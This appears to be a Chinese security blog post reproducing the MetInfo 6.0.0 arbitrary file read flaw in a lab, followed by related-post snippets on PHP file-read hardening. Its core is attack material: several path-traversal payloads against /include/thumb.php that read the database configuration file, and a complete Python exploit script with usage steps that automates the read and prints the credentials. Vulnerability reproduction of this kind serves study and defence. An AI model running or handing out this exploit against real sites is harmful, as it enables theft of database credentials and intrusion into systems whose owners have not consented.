metinfo_6.0.0_file-read 任意文件读取漏洞复现

原创 已于 2023-09-15 09:00:11 修改 · 694 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #运维 #安全

于 2023-08-31 19:21:04 首次发布

文章目录

metinfo_6.0.0_file-read版本下载

metinfo_6.0.0_file-read

说明内容
漏洞编号
漏洞名称MetInfo 6.0.0 任意文件读取漏洞
漏洞评级高危
影响范围* MetInfo 6.0.0
漏洞描述MetInfo 存在任意文件读取漏洞,攻击者利用该漏洞, 在具有权限的情况下,可以读取网站任意文件,包括配置文件等敏感文件。
修复方案* 打补丁 升级 上设备

漏洞描述

MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

漏洞等级

高危

影响版本

  • MetInfo 6.0.0

漏洞复现

基础环境

组件版本
OSMicrosoft Windows Server 2016 Standard
Web ServerphpStudy 2016
MetInfo6.0.0

漏洞点

/include/thumb.php

漏洞复现

image-20230831112121248

image-20230831112218631

进入网站:

image-20230831115051839

访问漏洞点:/include/thumb.php ,并进行过抓包

image-20230831115843174

第一次测试

/include/thumb.php?dir=..././http/.././config/config_db.php

image-20230831140913695

发现没有读到数据库的配置信息

第二次测试

/include/thumb.php?dir=.....///http/.....///config/config_db.php

image-20230831141039106

还是没有读到数据库的配置信息

第三次测试

/include/thumb.php?dir=http/......///......///config/config_db.php

image-20230831141118090

一样没有读取到数据库的配置信息

第四次测试

/include/thumb.php?dir=http\..\..\config\config_db.php

image-20230831141516417

这次我们发现读取到了数据库的配置信息

注意:

  • 此POC 仅适用于Windows 系统,Linux 下无效。
深度利用

EXP 编写

import requests
import sys

banner = """
MetInfo 6.0.0
    ___________.__.__           __________                   .___
    \_   _____/|__|  |   ____   \______   \ ____ _____     __| _/
    |    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | 
    |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | 
    \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | 
        \/                 \/          \/     \/     \/      \/ 
                                                        - AJEST
Usage: python3 *.py http://10.4.7.130/metinfo_6.0.0
"""

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

dir_list = [
    "..././http/..././config/config_db.php",
    ".....///http/.....///config/config_db.php",
    "http/.....///.....///config/config_db.php",
    "http\..\..\config\config_db.php"
]

def attack(host):
    vul = "/include/thumb.php"
    url = host + vul

    res = requests.get(url = url, headers = headers)

    if res.status_code != 200:
        print(f"[INFO] {vul} is Not Exists!")
        exit()

    print(f"[INFO] {vul} is Exists!")

    for param in dir_list:
        params = {
            "dir":  param 
        }

        res = requests.get(url = url, params = params, headers = headers)

        print(f"[INFO] Test URL: {res.url}")

        if "<?php" in res.text:
            print("[RESULT] The target is vulnreable!")
            print(f"[RESULT]\n{res.text}")
            break

if len(sys.argv) < 2:
    print(banner)
    exit()

host = sys.argv[1]

attack(host = host)

利用过程:

在桌面创建一个exp.py文件,将代码放入进去,然后执行:

sudo python3 *.py http://10.9.75.131/metinfo6.0.0/

解释:

  • sudo 是用来以管理者权限运行命令的关键字。
  • python3 表示要使用 Python 3 解释器来执行脚本。
  • *.py 是一个通配符,表示选择当前目录下所有以 “.py” 结尾的文件。
  • http://10.9.75.131/metinfo6.0.0/ 是目标URL

利用成功

image-20230831165423579

文件读取漏洞复现Metinfo 6.0.0
m0_56578216的博客
08-31 1057
安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。
metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 1143
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2090
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
java代码审计思维导图_代码审计-MetInfo 6.0.0 sql注入漏洞
weixin_35925956的博客
02-28 327
首先漏洞存在于app\system\message\web\message.class.php文件中,变量{$_M[form][id]}直接拼接在SQL语句中,且验证码检测函数是在SQL语句查询之后,这也就造成了我们可以无视验证码检测函数,进行SQL注入。具体问题函数代码如下:$met_fd_ok=DB::get_one("select * from {$_M[table][config]} wh...
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 482
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1938
进行漏洞复现读取敏感文件
metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 755
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
[漏洞检查项]File Read | file-read | 任意文件读取
m0_46101480的博客
11-09 239
攻击者可以任意读取文件漏洞读取敏感文件,包括日志文件、配置文件、网站源代码文件和系统文件等。.数据库配置文件,如/metinfo_6.0.0/config/config_db.php。网站开启的文件读取功能,但是对文件读取没有做限制或限制不足,导致任意文件读取。在动态文件读取的地方,可以尝试修改文件路径的产生,尝试读取其它文件。.使用白名单,让web 用户只能访问(读取),所需要的文件和路径。.Linux系统账号文件,如/etc/passwd。.日志文件,如/var/log/secure。
【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
chualam的博客
11-02 926
readfile函数(xx) 控制xx里面的内容就可以实现任意读取
metinfo_6.0.0_file-read 漏洞复现
QYbkx974的博客
11-14 154
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
漏洞复现Metinfo6.0.0任意文件读取漏洞复现
过期的秋刀鱼
11-05 1117
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0
漏洞复现Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 2989
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0
metinfo 6.0 任意文件读取漏洞
浅笑996的博客
12-20 2043
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...
最新系统漏洞--Metinfo SQL注入漏洞
weixin_48555088的博客
11-09 2433
最新系统漏洞2021年11月7日 受影响系统: Metainfo MetInfo 7.0.0 beta 描述: Metinfo是中国米拓(Metinfo)公司的一套使用PHP和Mysql开发的内容管理系统(CMS)。 MetInfo 7.0.0beta版本存在SQL注入漏洞。攻击者可利用该漏洞通过admin/?n=language&c=language_web&a=doAddLanguage执行SQL注入。 <**> 建议: 厂商补丁: Metainfo 目前厂商已经发布了升级补
MetInfo任意文件读取--任意文件读取漏洞
m0_63241485的博客
08-29 4103
任意文件读取漏洞分析
01、版本管理-GIT
快把钟哥带走
06-12 240
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
metinfo多个漏洞(可getshell)
kendyhj9999的专栏
05-21 2998
http://www.wooyun.org/bugs/wooyun-2010-043795
[漏洞复现]metinfo6.0.0任意文件读取
feigerger的博客
08-31 237
metinfo6.0.0任意文件读取漏洞复现
metinfo __ 6.0.0 __ file-read
cgjil的博客
09-12 349
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的。文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
PHP任意文件读取漏洞
最新发布
07-08
### 任意文件读取漏洞详情 任意文件读取漏洞通常是指应用程序中存在某些功能允许攻击者通过构造特定的请求,访问或下载服务器上的任意文件。这类漏洞往往出现在处理文件读取或下载的功能模块中,尤其是在路径参数未经过严格校验的情况下。 PHP 中常见的文件读取函数包括 `readfile` 和 `file_get_contents` 等。如果这些函数的参数(例如文件路径)直接由用户输入控制,并且没有对路径进行严格的过滤和验证,则可能导致任意文件读取漏洞。例如: ```php <?php $filename = $_GET['file']; readfile($filename); ?> ``` 在上述代码中,若用户传入类似 `../../../../etc/passwd` 的路径,则可能绕过限制读取敏感文件 [^1]。 此外,一些内容管理系统(CMS)或插件也可能存在此类漏洞。例如 MetInfo 6.0.0 ~ 6.1.0 版本中的 `/app/system/include/module/old_thumb.class.php` 文件存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取网站上的敏感文件 [^2]。 ### 解决方案 为了防止 PHP 应用程序出现任意文件读取漏洞,可以采取以下措施: 1. **避免直接使用用户输入作为文件路径**:尽量不要将用户输入直接用于文件操作,而是使用预定义的白名单机制来控制可访问的文件。 2. **严格校验输入路径**: - 使用正则表达式对输入进行匹配,确保其符合预期格式。 - 避免使用目录遍历字符如 `../` 或 `..\`。 - 使用 `realpath()` 或 `basename()` 等函数提取合法路径部分。 3. **设置文件访问权限**:确保应用程序只能访问指定目录下的文件,可以通过配置服务器环境变量(如 `open_basedir`)来限制 PHP 脚本能够访问的目录范围。 4. **更新和修补第三方组件**:对于使用的内容管理系统(如 WordPress、MetInfo 等),应及时更新到最新版本以修复已知的安全漏洞 [^4]。 5. **最小权限原则**:运行 Web 服务器时应使用最低权限账户,这样即使发生漏洞也不会导致整个系统被攻破。 6. **日志监控与异常处理**:记录所有可疑行为并设置警报机制,以便及时发现潜在威胁。 7. **安全编码实践**:开发过程中遵循安全编码规范,定期进行代码审查和渗透测试,提高整体安全性。 ### 示例修复代码 下面是一个简单的修复示例,展示了如何限制用户只能访问特定目录下的文件: ```php <?php $allowedPath = '/var/www/html/files/'; $userInput = isset($_GET['file']) ? $_GET['file'] : ''; // 构造完整路径 $requestedFile = realpath($allowedPath . $userInput); // 检查是否在允许的目录内 if (strpos($requestedFile, $allowedPath) === 0 && is_file($requestedFile)) { readfile($requestedFile); } else { echo "Access denied."; } ?> ``` 在此示例中,只有当请求的文件位于 `$allowedPath` 目录下时才会被读取,从而有效防止了任意文件读取攻击 。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值